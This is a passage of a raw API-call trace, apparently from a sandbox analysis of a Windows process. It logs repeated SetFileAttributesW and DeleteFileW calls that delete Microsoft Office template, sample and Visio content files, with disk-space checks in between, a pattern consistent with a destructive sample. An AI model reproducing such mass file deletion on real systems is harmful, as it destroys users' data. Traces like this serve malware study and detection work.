lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBREF.XML", dwFileAttributes=0x80) returned 1 [0081.573] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBREF.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebref.xml")) returned 1 [0081.577] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.XML", dwFileAttributes=0x80) returned 1 [0081.581] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebsbr.xml")) returned 1 [0081.584] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIPC.XML", dwFileAttributes=0x80) returned 1 [0081.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIPC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgzipc.xml")) returned 1 [0081.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.598] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.XML", dwFileAttributes=0x80) returned 1 [0081.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\email.xml")) returned 1 [0081.604] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.XML", dwFileAttributes=0x80) returned 1 [0081.609] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\envelope.xml")) returned 1 [0081.612] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.XML", dwFileAttributes=0x80) returned 1 [0081.621] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyer.xml")) returned 1 [0081.625] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.XML", dwFileAttributes=0x80) returned 1 [0081.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\foldproj.xml")) returned 1 [0081.632] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.XML", dwFileAttributes=0x80) returned 1 [0081.637] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\gift.xml")) returned 1 [0081.640] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.XML", dwFileAttributes=0x80) returned 1 [0081.648] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\greeting.xml")) returned 1 [0081.651] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.XML", dwFileAttributes=0x80) returned 1 [0081.656] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\invite.xml")) returned 1 [0081.660] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.XML", dwFileAttributes=0x80) returned 1 [0081.665] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\label.xml")) returned 1 [0081.668] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.XML", dwFileAttributes=0x80) returned 1 [0081.674] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\letthead.xml")) returned 1 [0081.676] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MAIN.XML", dwFileAttributes=0x80) returned 1 [0081.682] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MAIN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\main.xml")) returned 1 [0081.685] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.XML", dwFileAttributes=0x80) returned 1 [0081.689] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\menu.xml")) returned 1 [0081.692] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.XML", dwFileAttributes=0x80) returned 1 [0081.698] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\news.xml")) returned 1 [0081.708] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.717] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.XML", dwFileAttributes=0x80) returned 1 [0081.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\postcard.xml")) returned 1 [0081.721] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.XML", dwFileAttributes=0x80) returned 1 [0081.724] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\program.xml")) returned 1 [0081.730] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.735] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.XML", dwFileAttributes=0x80) returned 1 [0081.735] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\qp.xml")) returned 1 [0081.739] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.XML", dwFileAttributes=0x80) returned 1 [0081.743] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\resume.xml")) returned 1 [0081.745] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.XML", dwFileAttributes=0x80) returned 1 [0081.750] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sign.xml")) returned 1 [0081.754] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.XML", dwFileAttributes=0x80) returned 1 [0081.759] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webpage.xml")) returned 1 [0081.762] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.XML", dwFileAttributes=0x80) returned 1 [0081.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\withcomp.xml")) returned 1 [0081.769] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.XML", dwFileAttributes=0x80) returned 1 [0081.773] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wordrep.xml")) returned 1 [0081.776] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.776] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.777] CoTaskMemFree (pv=0x506980) [0081.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.782] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.782] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.782] CoTaskMemFree (pv=0x506980) [0081.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.783] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\SOLVSAMP.XLS", dwFileAttributes=0x80) returned 1 [0081.794] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SAMPLES\\SOLVSAMP.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\samples\\solvsamp.xls")) returned 1 [0081.797] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.797] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.797] CoTaskMemFree (pv=0x506980) [0081.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.797] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.797] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.797] CoTaskMemFree (pv=0x506980) [0081.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.798] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.798] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.798] CoTaskMemFree (pv=0x506980) [0081.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.818] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ASTMGT.XLS", dwFileAttributes=0x80) returned 1 [0081.824] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ASTMGT.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\astmgt.xls")) returned 1 [0081.827] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDGPLAN.DWG", dwFileAttributes=0x80) returned 1 [0081.885] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDGPLAN.DWG" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bldgplan.dwg")) returned 1 [0081.891] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDGPLAN.JPG", dwFileAttributes=0x80) returned 1 [0081.899] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLDGPLAN.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bldgplan.jpg")) returned 1 [0081.903] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKS.DWG", dwFileAttributes=0x80) returned 1 [0081.917] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BLOCKS.DWG" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\blocks.dwg")) returned 1 [0081.924] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML", dwFileAttributes=0x80) returned 1 [0081.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\brainstm.xml")) returned 1 [0081.946] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ORGDATA.TXT", dwFileAttributes=0x80) returned 1 [0081.950] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ORGDATA.TXT" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\orgdata.txt")) returned 1 [0081.953] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ORGDATA.XLS", dwFileAttributes=0x80) returned 1 [0081.959] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ORGDATA.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\orgdata.xls")) returned 1 [0081.964] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\PRCIMP.XLS", dwFileAttributes=0x80) returned 1 [0081.970] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\PRCIMP.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\prcimp.xls")) returned 1 [0081.975] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\PRJMGT.XLS", dwFileAttributes=0x80) returned 1 [0081.980] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\PRJMGT.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\prjmgt.xls")) returned 1 [0081.984] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\PROJTL.XLS", dwFileAttributes=0x80) returned 1 [0081.989] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\PROJTL.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\projtl.xls")) returned 1 [0081.994] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0081.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\SALSUM.XLS", dwFileAttributes=0x80) returned 1 [0081.999] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\SALSUM.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\salsum.xls")) returned 1 [0082.008] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0082.008] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0082.008] CoTaskMemFree (pv=0x506980) [0082.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0082.008] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0082.008] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0082.009] CoTaskMemFree (pv=0x506980) [0082.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0082.010] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0082.010] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0082.010] CoTaskMemFree (pv=0x506980) [0082.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", 